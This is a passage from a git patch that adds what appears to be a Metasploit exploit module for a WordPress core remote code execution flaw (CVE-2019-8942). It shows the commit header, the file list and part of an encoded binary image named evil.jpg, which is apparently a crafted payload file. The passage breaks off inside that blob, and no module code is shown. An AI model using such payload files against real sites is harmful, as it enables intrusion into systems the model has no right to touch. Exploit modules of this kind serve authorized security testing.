From 23a86e7ad2e6178cc7dbe6cef49a9f454d7d11bf Mon Sep 17 00:00:00 2001
From: wilfried <wilfried@debian>
Date: Tue, 19 Mar 2019 16:03:29 +0100
Subject: [PATCH 01/16] Add exploit module for Wordpress core <=4.9.8
 (CVE-2019-8942)

---
 data/exploits/CVE-2019-8942/evil.jpg        | Bin 0 -> 28541 bytes
 data/exploits/CVE-2019-8942/evilshell.jpg   | Bin 0 -> 11820 bytes
 modules/exploits/unix/webapp/wp_crop_rce.rb | 396 ++++++++++++++++++++
 3 files changed, 396 insertions(+)
 create mode 100644 data/exploits/CVE-2019-8942/evil.jpg
 create mode 100644 data/exploits/CVE-2019-8942/evilshell.jpg
 create mode 100644 modules/exploits/unix/webapp/wp_crop_rce.rb

diff --git a/data/exploits/CVE-2019-8942/evil.jpg b/data/exploits/CVE-2019-8942/evil.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ecafd2ffed9b731f628337d48678c5979c5ec923
GIT binary patch
literal 28541
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
